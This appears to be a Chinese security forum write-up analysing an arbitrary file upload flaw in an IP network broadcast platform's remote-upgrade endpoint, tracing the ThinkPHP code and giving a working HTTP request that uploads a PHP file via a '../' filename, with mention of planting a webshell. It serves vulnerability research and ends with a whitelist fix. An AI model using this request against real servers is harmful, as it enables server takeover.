奇安信攻防社区-IP网络广播服务平台remote-upgrade upload接口文件上传漏洞分析

IP网络广播服务平台remote-upgrade upload接口文件上传漏洞分析

IP网络广播服务平台是采用云计算的模型分布部署实施的广播系统。云广播系统突破了单台服务器性能瓶颈，支持多层次跨地域广播，构建全省乃至全国的IP网络广播系统，可以广泛应用在农村、连锁机构等需要跨地域统一建设的广播系统中。IP网络广播服务平台存在任意文件上传漏洞，攻击者可利用该漏洞上传webshell，获取服务器权限。

一、漏洞简介
------

```php
IP网络广播服务平台是采用云计算的模型分布部署实施的广播系统。云广播系统突破了单台服务器性能瓶颈，支持多层次跨地域广播，构建全省乃至全国的IP网络广播系统，可以广泛应用在农村、连锁机构等需要跨地域统一建设的广播系统中。IP网络广播服务平台存在任意文件上传漏洞，攻击者可利用该漏洞上传webshell，获取服务器权限。
```

二、影响版本
------

产品名称：IP网络广播服务平台

影响版本：T-7700RP-V2.917-20211105

三、漏洞原理分析
--------

拿到源码，发现使用的ThinkPHP框架，先找路由文件

route.php

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-c67c406e89379c1c11924eb8711d50d13cd0bd24.png)

全局搜索 remote-upgrade

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-d59535ad19e6ab691df14c6235385ecdda263bfd.png)

可以看到控制器在remoteUpgrade/RemoteUpgradeController.php文件中。  
分别传入：  
/upload  
/all  
/delete  
三个接口方法，我们重点看upload方法

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-b3cc52bdca6580d6161b0c23f4b95c7e01939784.png)

可以在102行中直接调用了file()方法进行文件操作，跟进该方法：

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-6d4d51fa5b401aa0bc9164d860abf7d8ba16c3bf.png)

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-fc5b1c28f41303a2b89d877ae2b56d2cc22e0a65.png)

在该方法中，首先进行了初始化文件数组操作：

```php
if (empty($this->file)) {
    $this->file = isset($_FILES) ? $_FILES : [];
}
...
```

接着判断传入的文件名是否为空，如果不为空，则进行文件上传操作：

```php
$files = $this->file;
if (!empty($files)) {
    // 处理上传文件
    $array = [];
    foreach ($files as $key => $file) {
        if (is_array($file['name'])) {
        ...
```

最后处理上传的文件名和后缀，并返回文件上传结果。在该方法中没有做任何黑白名单限制，导致可以上传任意后缀文件，造成文件上传漏洞。

接着回到RemoteUpgradeController.php中：

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-4eaddeb0a882ecdf5afe258e061e772ca1be0033.png)

可以看到文件上传到/uploads/remote\_upgrade/目录下，并返回该文件的MD5 哈希作为文件名+文件后缀

四、环境搭建
------

```php
本地搭建的环境，进行测试。
```

影响互联网资产：

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-07fa0fcae22c675e3d3d57771b8d9eff58015cc6.png)

复现环境：

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-a66d0504414026d7002238991fb4f19390209a36.png)

五、漏洞复现
------

构造POC如下：

```php
POST /api/v2/remote-upgrade/upload HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Content-Length: 239
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryruvtJJYIs63ReAhU
Connection: close

------WebKitFormBoundaryruvtJJYIs63ReAhU
Content-Disposition: form-data; name="file"; filename="../test.php"
Content-Type: application/octet-stream

<?php echo test_vuln;unlink(__FILE__);?>
------WebKitFormBoundaryruvtJJYIs63ReAhU--

```

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-c2f6368074137d660b9939d897571a0adacf56e8.png)

访问：

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-3c59ba7c63d6877437fddae6e4ea3f4c79bd7aaf.png)

漏洞验证成功。

在实际授权的攻防中，我们可以上传webshell，获取服务器权限：

![image.png](https://shs3.b.qianxin.com/attack_forum/2024/08/attach-2a5af053417a43afd985c5783562224ee3d153b0.png)

六、修复建议
------

建议做严格的白名单限制。

七、总结
----

这是比较常规的ThinkPHP的框架审计，主要看懂代码的路由架构，分析每路由功能，进行审计！

发表于 2024-09-02 10:00:02
阅读 ( 7005 )
分类：Web应用

1 条评论

Jay 1秒前

源码能否分享下啊师傅，230287951@qq.com